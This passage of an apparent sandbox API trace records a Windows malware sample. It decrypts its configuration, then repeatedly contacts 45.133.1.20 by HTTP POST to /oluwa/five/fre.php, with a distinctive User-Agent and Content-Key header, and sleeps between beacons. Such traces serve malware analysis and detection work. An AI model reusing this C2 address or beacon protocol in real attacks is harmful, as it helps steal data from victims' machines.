returned 0x6a0000 [0159.378] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6bab00 | out: hHeap=0x6a0000) returned 1 [0159.378] GetProcessHeap () returned 0x6a0000 [0159.378] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6b6de0 | out: hHeap=0x6a0000) returned 1 [0159.378] GetProcessHeap () returned 0x6a0000 [0159.379] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6b49a0 | out: hHeap=0x6a0000) returned 1 [0159.379] GetProcessHeap () returned 0x6a0000 [0159.379] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6b3670 | out: hHeap=0x6a0000) returned 1 [0159.385] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0x41289a, lpParameter=0x6bf370, dwCreationFlags=0x0, lpThreadId=0x19ff08 | out: lpThreadId=0x19ff08*=0x534) returned 0x298 [0159.388] Sleep (dwMilliseconds=0xea60) [0159.390] GetProcessHeap () returned 0x6a0000 [0159.390] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x40) returned 0x6b49a0 [0159.391] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0159.391] CryptAcquireContextW (in: phProv=0x19fca8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x10 | out: phProv=0x19fca8*=0x0) returned 1 [0159.403] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0159.403] CryptAcquireContextW (in: phProv=0x19fca8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x8 | out: phProv=0x19fca8*=0x6bec18) returned 1 [0159.419] GetProcessHeap () returned 0x6a0000 [0159.419] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x24) returned 0x6b0af0 [0159.420] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0159.420] CryptImportKey (in: hProv=0x6bec18, pbData=0x6b0af0, dwDataLen=0x24, hPubKey=0x0, dwFlags=0x0, phKey=0x19fcac | out: phKey=0x19fcac*=0x6ad4e0) returned 1 [0159.421] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0159.421] CryptSetKeyParam (hKey=0x6ad4e0, dwParam=0x4, pbData=0x19fca4*=0x1, dwFlags=0x0) returned 1 [0159.422] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0159.422] CryptSetKeyParam (hKey=0x6ad4e0, dwParam=0x1, pbData=0x418960, dwFlags=0x0) returned 1 [0159.422] GetProcessHeap () returned 0x6a0000 [0159.423] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6b0af0 | out: hHeap=0x6a0000) returned 1 [0159.424] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0159.424] CryptDecrypt (in: hKey=0x6ad4e0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x6b49a0, pdwDataLen=0x19fcfc | out: pbData=0x6b49a0, pdwDataLen=0x19fcfc) returned 1 [0159.425] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0159.425] CryptDestroyKey (hKey=0x6ad4e0) returned 1 [0159.427] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0159.428] CryptReleaseContext (hProv=0x6bec18, dwFlags=0x0) returned 1 [0159.428] GetProcessHeap () returned 0x6a0000 [0159.428] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x212) returned 0x6b6de0 [0159.429] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77680000 [0159.429] StrStrA (lpFirst="ËÊÑÎÌÌÑÎÑÍÏÐ\x90\x93\x8a\x88\x9eÐ\x99\x96\x89\x9aÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch="http://") returned 0x0 [0159.430] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77680000 [0159.430] StrStrA (lpFirst="ËÊÑÎÌÌÑÎÑÍÏÐ\x90\x93\x8a\x88\x9eÐ\x99\x96\x89\x9aÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch="https://") returned 0x0 [0159.431] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77680000 [0159.431] StrStrA (lpFirst="ËÊÑÎÌÌÑÎÑÍÏÐ\x90\x93\x8a\x88\x9eÐ\x99\x96\x89\x9aÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch="/") returned 0x0 [0159.432] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77680000 [0159.433] StrStrA (lpFirst="ËÊÑÎÌÌÑÎÑÍÏÐ\x90\x93\x8a\x88\x9eÐ\x99\x96\x89\x9aÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch=":") returned 0x0 [0159.433] GetProcessHeap () returned 0x6a0000 [0159.433] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x20) returned 0x6b3670 [0159.433] getaddrinfo (in: pNodeName="ËÊÑÎÌÌÑÎÑÍÏÐ\x90\x93\x8a\x88\x9eÐ\x99\x96\x89\x9aÐ\x99\x8d\x9aÑ\x8f\x97\x8f", pServiceName="80", pHints=0x19fcb8*(ai_flags=0, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x0, ai_canonname=0x0, ai_addr=0x0, ai_next=0x0), ppResult=0x19fcd8 | out: ppResult=0x19fcd8*=0x0) returned 11001 [0159.433] GetProcessHeap () returned 0x6a0000 [0159.433] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6b3670 | out: hHeap=0x6a0000) returned 1 [0159.433] GetProcessHeap () returned 0x6a0000 [0159.434] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6b6de0 | out: hHeap=0x6a0000) returned 1 [0159.434] GetProcessHeap () returned 0x6a0000 [0159.434] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6b49a0 | out: hHeap=0x6a0000) returned 1 [0159.434] GetProcessHeap () returned 0x6a0000 [0159.434] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x40) returned 0x6b4d48 [0159.435] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0159.435] CryptAcquireContextW (in: phProv=0x19fca8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x10 | out: phProv=0x19fca8*=0x0) returned 1 [0159.442] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0159.443] CryptAcquireContextW (in: phProv=0x19fca8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x8 | out: phProv=0x19fca8*=0x6beca0) returned 1 [0159.451] GetProcessHeap () returned 0x6a0000 [0159.451] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x24) returned 0x6b0c10 [0159.451] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0159.452] CryptImportKey (in: hProv=0x6beca0, pbData=0x6b0c10, dwDataLen=0x24, hPubKey=0x0, dwFlags=0x0, phKey=0x19fcac | out: phKey=0x19fcac*=0x6ad020) returned 1 [0159.453] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0159.453] CryptSetKeyParam (hKey=0x6ad020, dwParam=0x4, pbData=0x19fca4*=0x1, dwFlags=0x0) returned 1 [0159.454] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0159.454] CryptSetKeyParam (hKey=0x6ad020, dwParam=0x1, pbData=0x418960, dwFlags=0x0) returned 1 [0159.454] GetProcessHeap () returned 0x6a0000 [0159.455] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6b0c10 | out: hHeap=0x6a0000) returned 1 [0159.455] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0159.456] CryptDecrypt (in: hKey=0x6ad020, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x6b4d48, pdwDataLen=0x19fcfc | out: pbData=0x6b4d48, pdwDataLen=0x19fcfc) returned 1 [0159.456] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0159.457] CryptDestroyKey (hKey=0x6ad020) returned 1 [0159.458] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0159.458] CryptReleaseContext (hProv=0x6beca0, dwFlags=0x0) returned 1 [0159.458] GetProcessHeap () returned 0x6a0000 [0159.458] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x212) returned 0x6b6de0 [0159.459] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77680000 [0159.459] StrStrA (lpFirst="45.133.1.20/oluwa/five/fre.php", lpSrch="http://") returned 0x0 [0159.460] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77680000 [0159.461] StrStrA (lpFirst="45.133.1.20/oluwa/five/fre.php", lpSrch="https://") returned 0x0 [0159.462] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77680000 [0159.462] StrStrA (lpFirst="45.133.1.20/oluwa/five/fre.php", lpSrch="/") returned="/oluwa/five/fre.php" [0159.463] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77680000 [0159.463] StrStrA (lpFirst="45.133.1.20/oluwa/five/fre.php", lpSrch=":") returned 0x0 [0159.463] GetProcessHeap () returned 0x6a0000 [0159.463] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x20) returned 0x6b3670 [0159.463] getaddrinfo (in: pNodeName="45.133.1.20", pServiceName="80", pHints=0x19fcb8*(ai_flags=0, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x0, ai_canonname=0x0, ai_addr=0x0, ai_next=0x0), ppResult=0x19fcd8 | out: ppResult=0x19fcd8*=0x6b9988*(ai_flags=4, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x10, ai_canonname=0x0, ai_addr=0x6be958*(sa_family=2, sin_port=0x50, sin_addr="45.133.1.20"), ai_next=0x0)) returned 0 [0159.463] GetProcessHeap () returned 0x6a0000 [0159.463] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x4) returned 0x6ba990 [0159.463] socket (af=2, type=1, protocol=6) returned 0x29c [0159.464] connect (s=0x29c, name=0x6be958*(sa_family=2, sin_port=0x50, sin_addr="45.133.1.20"), namelen=16) returned 0 [0159.527] FreeAddrInfoW (pAddrInfo=0x6b9988*(ai_flags=4, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x10, ai_canonname=0x0, ai_addr=0x6be958*(sa_family=2, sin_port=0x50, sin_addr="45.133.1.20"), ai_next=0x0)) [0159.527] GetProcessHeap () returned 0x6a0000 [0159.527] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x7d) returned 0x6befd0 [0159.527] GetProcessHeap () returned 0x6a0000 [0159.527] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x201b) returned 0x6c2708 [0159.528] LoadLibraryW (lpLibFileName="user32") returned 0x75640000 [0159.529] wvsprintfA (in: param_1=0x6c2708, param_2="POST %s HTTP/1.0\r\nUser-Agent: %s\r\nHost: %s\r\nAccept: */*\r\nContent-Type: application/octet-stream\r\nContent-Encoding: binary\r\n", arglist=0x19fce0 | out: param_1="POST /oluwa/five/fre.php HTTP/1.0\r\nUser-Agent: Mozilla/4.08 (Charon; Inferno)\r\nHost: 45.133.1.20\r\nAccept: */*\r\nContent-Type: application/octet-stream\r\nContent-Encoding: binary\r\n") returned 177 [0159.530] GetProcessHeap () returned 0x6a0000 [0159.530] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0xb3) returned 0x6bbc60 [0159.530] GetProcessHeap () returned 0x6a0000 [0159.530] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6c2708 | out: hHeap=0x6a0000) returned 1 [0159.530] GetProcessHeap () returned 0x6a0000 [0159.530] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x3e) returned 0x6b49a0 [0159.530] GetProcessHeap () returned 0x6a0000 [0159.530] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x1fdc) returned 0x6c2708 [0159.531] LoadLibraryW (lpLibFileName="user32") returned 0x75640000 [0159.532] wvsprintfA (in: param_1=0x6c2708, param_2="%sContent-Key: %X\r\nContent-Length: %i\r\nConnection: close\r\n\r\n", arglist=0x19fce0 | out: param_1="POST /oluwa/five/fre.php HTTP/1.0\r\nUser-Agent: Mozilla/4.08 (Charon; Inferno)\r\nHost: 45.133.1.20\r\nAccept: */*\r\nContent-Type: application/octet-stream\r\nContent-Encoding: binary\r\nContent-Key: 2D36A626\r\nContent-Length: 159\r\nConnection: close\r\n\r\n") returned 242 [0159.532] GetProcessHeap () returned 0x6a0000 [0159.532] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0xf4) returned 0x6bbd20 [0159.532] GetProcessHeap () returned 0x6a0000 [0159.533] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6c2708 | out: hHeap=0x6a0000) returned 1 [0159.533] send (s=0x29c, buf=0x6bbd20*, len=242, flags=0) returned 242 [0159.535] send (s=0x29c, buf=0x6bb998*, len=159, flags=0) returned 159 [0159.535] GetProcessHeap () returned 0x6a0000 [0159.535] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0xfd0) returned 0x6bf370 [0159.535] recv (in: s=0x29c, buf=0x6bf370, len=4048, flags=0 | out: buf=0x6bf370*) returned 204 [0159.609] GetProcessHeap () returned 0x6a0000 [0159.609] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6bbd20 | out: hHeap=0x6a0000) returned 1 [0159.611] GetProcessHeap () returned 0x6a0000 [0159.611] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6b49a0 | out: hHeap=0x6a0000) returned 1 [0159.611] GetProcessHeap () returned 0x6a0000 [0159.612] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6bbc60 | out: hHeap=0x6a0000) returned 1 [0159.612] GetProcessHeap () returned 0x6a0000 [0159.612] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6befd0 | out: hHeap=0x6a0000) returned 1 [0159.613] closesocket (s=0x29c) returned 0 [0159.613] GetProcessHeap () returned 0x6a0000 [0159.613] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6ba990 | out: hHeap=0x6a0000) returned 1 [0159.613] GetProcessHeap () returned 0x6a0000 [0159.614] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6b6de0 | out: hHeap=0x6a0000) returned 1 [0159.614] GetProcessHeap () returned 0x6a0000 [0159.614] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6b4d48 | out: hHeap=0x6a0000) returned 1 [0159.614] GetProcessHeap () returned 0x6a0000 [0159.615] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6b3670 | out: hHeap=0x6a0000) returned 1 [0159.615] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0x41289a, lpParameter=0x6bf370, dwCreationFlags=0x0, lpThreadId=0x19ff08 | out: lpThreadId=0x19ff08*=0xc0c) returned 0x29c [0159.617] Sleep (dwMilliseconds=0xea60) [0159.619] GetProcessHeap () returned 0x6a0000 [0159.619] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x40) returned 0x6b4d48 [0159.619] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0159.620] CryptAcquireContextW (in: phProv=0x19fca8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x10 | out: phProv=0x19fca8*=0x0) returned 1 [0159.648] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0159.649] CryptAcquireContextW (in: phProv=0x19fca8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x8 | out: phProv=0x19fca8*=0x6bef48) returned 1 [0159.667] GetProcessHeap () returned 0x6a0000 [0159.667] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x24) returned 0x6b0af0 [0159.668] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0159.668] CryptImportKey (in: hProv=0x6bef48, pbData=0x6b0af0, dwDataLen=0x24, hPubKey=0x0, dwFlags=0x0, phKey=0x19fcac | out: phKey=0x19fcac*=0x6ad020) returned 1 [0159.669] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0159.669] CryptSetKeyParam (hKey=0x6ad020, dwParam=0x4, pbData=0x19fca4*=0x1, dwFlags=0x0) returned 1 [0159.670] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0159.671] CryptSetKeyParam (hKey=0x6ad020, dwParam=0x1, pbData=0x418960, dwFlags=0x0) returned 1 [0159.671] GetProcessHeap () returned 0x6a0000 [0159.671] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6b0af0 | out: hHeap=0x6a0000) returned 1 [0159.672] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0159.673] CryptDecrypt (in: hKey=0x6ad020, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x6b4d48, pdwDataLen=0x19fcfc | out: pbData=0x6b4d48, pdwDataLen=0x19fcfc) returned 1 [0159.673] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0159.674] CryptDestroyKey (hKey=0x6ad020) returned 1 [0159.675] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0159.675] CryptReleaseContext (hProv=0x6bef48, dwFlags=0x0) returned 1 [0159.675] GetProcessHeap () returned 0x6a0000 [0159.675] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x212) returned 0x6b6de0 [0159.676] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77680000 [0159.676] StrStrA (lpFirst="ËÊÑÎÌÌÑÎÑÍÏÐ\x90\x93\x8a\x88\x9eÐ\x99\x96\x89\x9aÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch="http://") returned 0x0 [0159.678] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77680000 [0159.678] StrStrA (lpFirst="ËÊÑÎÌÌÑÎÑÍÏÐ\x90\x93\x8a\x88\x9eÐ\x99\x96\x89\x9aÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch="https://") returned 0x0 [0159.679] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77680000 [0159.679] StrStrA (lpFirst="ËÊÑÎÌÌÑÎÑÍÏÐ\x90\x93\x8a\x88\x9eÐ\x99\x96\x89\x9aÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch="/") returned 0x0 [0159.680] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77680000 [0159.680] StrStrA (lpFirst="ËÊÑÎÌÌÑÎÑÍÏÐ\x90\x93\x8a\x88\x9eÐ\x99\x96\x89\x9aÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch=":") returned 0x0 [0159.680] GetProcessHeap () returned 0x6a0000 [0159.680] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x20) returned 0x6b3670 [0159.681] getaddrinfo (in: pNodeName="ËÊÑÎÌÌÑÎÑÍÏÐ\x90\x93\x8a\x88\x9eÐ\x99\x96\x89\x9aÐ\x99\x8d\x9aÑ\x8f\x97\x8f", pServiceName="80", pHints=0x19fcb8*(ai_flags=0, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x0, ai_canonname=0x0, ai_addr=0x0, ai_next=0x0), ppResult=0x19fcd8 | out: ppResult=0x19fcd8*=0x0) returned 11001 [0159.681] GetProcessHeap () returned 0x6a0000 [0159.682] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6b3670 | out: hHeap=0x6a0000) returned 1 [0159.682] GetProcessHeap () returned 0x6a0000 [0159.682] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6b6de0 | out: hHeap=0x6a0000) returned 1 [0159.682] GetProcessHeap () returned 0x6a0000 [0159.683] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6b4d48 | out: hHeap=0x6a0000) returned 1 [0159.683] GetProcessHeap () returned 0x6a0000 [0159.683] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x40) returned 0x6b49a0 [0159.684] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0159.684] CryptAcquireContextW (in: phProv=0x19fca8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x10 | out: phProv=0x19fca8*=0x0) returned 1 [0159.691] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0159.691] CryptAcquireContextW (in: phProv=0x19fca8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x8 | out: phProv=0x19fca8*=0x6bef48) returned 1 [0159.701] GetProcessHeap () returned 0x6a0000 [0159.701] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x24) returned 0x6b0af0 [0159.702] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0159.702] CryptImportKey (in: hProv=0x6bef48, pbData=0x6b0af0, dwDataLen=0x24, hPubKey=0x0, dwFlags=0x0, phKey=0x19fcac | out: phKey=0x19fcac*=0x6ad4e0) returned 1 [0159.703] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0159.703] CryptSetKeyParam (hKey=0x6ad4e0, dwParam=0x4, pbData=0x19fca4*=0x1, dwFlags=0x0) returned 1 [0159.704] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0159.704] CryptSetKeyParam (hKey=0x6ad4e0, dwParam=0x1, pbData=0x418960, dwFlags=0x0) returned 1 [0159.704] GetProcessHeap () returned 0x6a0000 [0159.705] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6b0af0 | out: hHeap=0x6a0000) returned 1 [0159.706] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0159.706] CryptDecrypt (in: hKey=0x6ad4e0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x6b49a0, pdwDataLen=0x19fcfc | out: pbData=0x6b49a0, pdwDataLen=0x19fcfc) returned 1 [0159.707] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0159.708] CryptDestroyKey (hKey=0x6ad4e0) returned 1 [0159.709] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0159.709] CryptReleaseContext (hProv=0x6bef48, dwFlags=0x0) returned 1 [0159.709] GetProcessHeap () returned 0x6a0000 [0159.709] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x212) returned 0x6b6de0 [0159.710] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77680000 [0159.710] StrStrA (lpFirst="45.133.1.20/oluwa/five/fre.php", lpSrch="http://") returned 0x0 [0159.711] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77680000 [0159.711] StrStrA (lpFirst="45.133.1.20/oluwa/five/fre.php", lpSrch="https://") returned 0x0 [0159.712] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77680000 [0159.713] StrStrA (lpFirst="45.133.1.20/oluwa/five/fre.php", lpSrch="/") returned="/oluwa/five/fre.php" [0159.713] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77680000 [0159.714] StrStrA (lpFirst="45.133.1.20/oluwa/five/fre.php", lpSrch=":") returned 0x0 [0159.714] GetProcessHeap () returned 0x6a0000 [0159.714] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x20) returned 0x6b3670 [0159.714] getaddrinfo (in: pNodeName="45.133.1.20", pServiceName="80", pHints=0x19fcb8*(ai_flags=0, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x0, ai_canonname=0x0, ai_addr=0x0, ai_next=0x0), ppResult=0x19fcd8 | out: ppResult=0x19fcd8*=0x6b9e38*(ai_flags=4, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x10, ai_canonname=0x0, ai_addr=0x6be9a0*(sa_family=2, sin_port=0x50, sin_addr="45.133.1.20"), ai_next=0x0)) returned 0 [0159.714] GetProcessHeap () returned 0x6a0000 [0159.714] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x4) returned 0x6baa60 [0159.714] socket (af=2, type=1, protocol=6) returned 0x2a0 [0159.715] connect (s=0x2a0, name=0x6be9a0*(sa_family=2, sin_port=0x50, sin_addr="45.133.1.20"), namelen=16) returned 0 [0159.740] FreeAddrInfoW (pAddrInfo=0x6b9e38*(ai_flags=4, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x10, ai_canonname=0x0, ai_addr=0x6be9a0*(sa_family=2, sin_port=0x50, sin_addr="45.133.1.20"), ai_next=0x0)) [0159.740] GetProcessHeap () returned 0x6a0000 [0159.741] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x7d) returned 0x6bf168 [0159.741] GetProcessHeap () returned 0x6a0000 [0159.741] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x201b) returned 0x6c2708 [0159.741] LoadLibraryW (lpLibFileName="user32") returned 0x75640000 [0159.742] wvsprintfA (in: param_1=0x6c2708, param_2="POST %s HTTP/1.0\r\nUser-Agent: %s\r\nHost: %s\r\nAccept: */*\r\nContent-Type: application/octet-stream\r\nContent-Encoding: binary\r\n", arglist=0x19fce0 | out: param_1="POST /oluwa/five/fre.php HTTP/1.0\r\nUser-Agent: Mozilla/4.08 (Charon; Inferno)\r\nHost: 45.133.1.20\r\nAccept: */*\r\nContent-Type: application/octet-stream\r\nContent-Encoding: binary\r\n") returned 177 [0159.743] GetProcessHeap () returned 0x6a0000 [0159.743] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0xb3) returned 0x6bbc60 [0159.743] GetProcessHeap () returned 0x6a0000 [0159.743] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6c2708 | out: hHeap=0x6a0000) returned 1 [0159.743] GetProcessHeap () returned 0x6a0000 [0159.743] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x3e) returned 0x6b4a30 [0159.743] GetProcessHeap () returned 0x6a0000 [0159.743] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x1fdc) returned 0x6c2708 [0159.744] LoadLibraryW (lpLibFileName="user32") returned 0x75640000 [0159.745] wvsprintfA (in: param_1=0x6c2708, param_2="%sContent-Key: %X\r\nContent-Length: %i\r\nConnection: close\r\n\r\n", arglist=0x19fce0 | out: param_1="POST /oluwa/five/fre.php HTTP/1.0\r\nUser-Agent: Mozilla/4.08 (Charon; Inferno)\r\nHost: 45.133.1.20\r\nAccept: */*\r\nContent-Type: application/octet-stream\r\nContent-Encoding: binary\r\nContent-Key: 2D36A626\r\nContent-Length: 159\r\nConnection: close\r\n\r\n") returned 242 [0159.746] GetProcessHeap () returned 0x6a0000 [0159.746] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0xf4) returned 0x6bbd20 [0159.746] GetProcessHeap () returned 0x6a0000 [0159.746] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6c2708 | out: hHeap=0x6a0000) returned 1 [0159.746] send (s=0x2a0, buf=0x6bbd20*, len=242, flags=0) returned 242 [0159.747] send (s=0x2a0, buf=0x6bb998*, len=159, flags=0) returned 159 [0159.747] GetProcessHeap () returned 0x6a0000 [0159.747] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0xfd0) returned 0x6bf370 [0159.747] recv (in: s=0x2a0, buf=0x6bf370, len=4048, flags=0 | out: buf=0x6bf370*) returned 204 [0159.818] GetProcessHeap () returned 0x6a0000 [0159.819] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6bbd20 | out: hHeap=0x6a0000) returned 1 [0159.819] GetProcessHeap () returned 0x6a0000 [0159.820] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6b4a30 | out: hHeap=0x6a0000) returned 1 [0159.820] GetProcessHeap () returned 0x6a0000 [0159.820] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6bbc60 | out: hHeap=0x6a0000) returned 1 [0159.820] GetProcessHeap () returned 0x6a0000 [0159.820] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6bf168 | out: hHeap=0x6a0000) returned 1 [0159.820] closesocket (s=0x2a0) returned 0 [0159.833] GetProcessHeap () returned 0x6a0000 [0159.833] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6baa60 | out: hHeap=0x6a0000) returned 1 [0159.833] GetProcessHeap () returned 0x6a0000 [0159.833] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6b6de0 | out: hHeap=0x6a0000) returned 1 [0159.833] GetProcessHeap () returned 0x6a0000 [0159.833] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6b49a0 | out: hHeap=0x6a0000) returned 1 [0159.834] GetProcessHeap () returned 0x6a0000 [0159.834] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6b3670 | out: hHeap=0x6a0000) returned 1 [0159.834] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0x41289a, lpParameter=0x6bf370, dwCreationFlags=0x0, lpThreadId=0x19ff08 | out: lpThreadId=0x19ff08*=0xbf8) returned 0x2a0 [0159.836] Sleep 